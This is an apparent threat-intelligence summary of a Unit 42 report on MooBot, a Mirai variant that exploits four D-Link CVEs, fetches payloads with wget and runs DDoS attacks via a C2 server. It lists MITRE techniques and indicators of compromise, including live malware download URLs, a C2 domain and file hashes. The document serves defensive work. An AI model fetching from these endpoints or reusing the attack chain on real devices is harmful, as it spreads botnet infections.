Threat Research

Mirai Variant MooBot Targeting D-Link Devices

Securonix

Unit 42 researchers describe MooBot, a Mirai variant, that leverages four D-Link vulnerabilities to seize control of exposed devices and deploy a botnet for DDoS attacks. The campaign downloads MooBot from a remote host, communicates with a C2 server, and includes a random-string generator and encrypted configuration data. #MooBot #D-Link

Keypoints

  • MooBot is a Mirai variant that targets D-Link devices running Linux.
  • The attack chain exploits four CVEs (CVE-2015-2051, CVE-2018-6530, CVE-2022-26258, CVE-2022-28958) to achieve remote code execution and initial access.
  • Exploits trigger a downloader to fetch MooBot payloads from a remote host (wget-based downloader).
  • MooBot establishes command-and-control communications and can instruct compromised devices to carry out DDoS against specified targets.
  • The malware uses a random-string generator, prints “get haxored!” on execution, and deletes its own binary after spawning processes.
  • MooBot encrypts its data with 0x22 (instead of Mirai’s encryption key) and decodes C2 configuration to identify the C2 server (vpn.komaru.today).
  • Palo Alto Networks offers protections via IoT Security, WildFire, URL Filtering, DNS Security and Threat Prevention signatures, plus ML-based anomaly detection.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The attacker exploits four D-Link vulnerabilities that could lead to remote code execution. [“The attacker utilizes four D-Link vulnerabilities that could lead to remote code execution.”]
  • [T1105] Ingress Tool Transfer – The attacker uses wget to download MooBot payloads from a remote host and execute them. [“The wget utility executes to download MooBot samples from the malware infrastructure and then executes the downloaded binaries.”]
  • [T1071.001] Web Protocols – The malware communicates with a C2 server to receive commands and send heartbeat messages to control DDoS actions. [“The malware will also send heartbeat messages to the C2 server and parse commands from C2 to start a DDoS attack.”]
  • [T1027] Obfuscated/Compressed Files and Information – MooBot encrypts its data with 0x22 (instead of Mirai’s encryption key). [“MooBot encrypts its data with 0x22.”]
  • [T1070.004] Indicator Removal on Host – The malware deletes the downloaded executable after execution. [“wipes out the executable file.”]

Indicators of Compromise

  • [Domain] C2 domain – vpn.komaru.today
  • [IP Address] Malware hosting/downloader – 159.203.15.179 (used to host MooBot payloads such as wget.sh and related artifacts)
  • [URL] Download and payload endpoints – http://159.203.15.179/wget.sh, http://159.203.15.179/wget.sh3
  • [File Name] Downloader and samples – rt, wget.sh
  • [SHA256] MooBot artifacts – B7EE57A42C6A4545AC6D6C29E1075FA1628E1D09B8C1572C848A70112D4C90A1, 46BB6E2F80B6CB96FF7D0F78B3BDBC496B69EB7F22CE15EFCAA275F07CFAE075

Read more: https://unit42.paloaltonetworks.com/moobot-d-link-devices/?web_view=true#post-124794-_73lw4g4a4pw2